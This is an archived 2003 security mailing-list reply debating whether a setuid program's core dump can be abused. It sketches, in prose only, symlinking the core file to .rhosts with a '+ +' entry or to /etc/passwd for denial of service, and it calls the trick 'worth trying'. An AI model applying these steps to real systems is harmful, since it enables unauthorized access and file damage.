On Wed, Mar 12, 2003 at 09:26:22PM +0100, Marco Ivaldi wrote: > > As to exploiting, no, I don't think you can exploit this: the core here > > is a result of the kernel processing a signal sent to the process, not > > of some overflow or invalid memory access or similar. > > Just wondering. What happens if you create a symlink to .rhosts and manage > to write a "+ +" in memory before coredump (i've not checked if it's > possible in this particular situation)? Or maybe symlinking /etc/passwd > and causing a DoS condition? This is just an example, but i'm not so sure > it's not possible to exploit this behaviour of a setuid program... > > Please correct me if i'm plain wrong:) This used to work a few years ago anyway. I would think recent versions of Unix-OS:s have fixed that rather trivial flaw, but it's worth trying. > :raptor > Antifork Research, Inc. 0xdeadbeef | raptor's labs > http://www.antifork.org http://www.0xdeadbeef.info -- Joel Eriksson ------------------------------------------------- Security Research & Systems Development at Bitnux PGP Key Server pgp.mit.edu, PGP Key ID 0x529FDBD1 A615 A1E1 3CA2 D7C2 CFEA 47B4 7EF7 E6B2 529F DBD1 -------------------------------------------------
This archive was generated by hypermail 2b30 : Thu Mar 13 2003 - 12:37:35 PST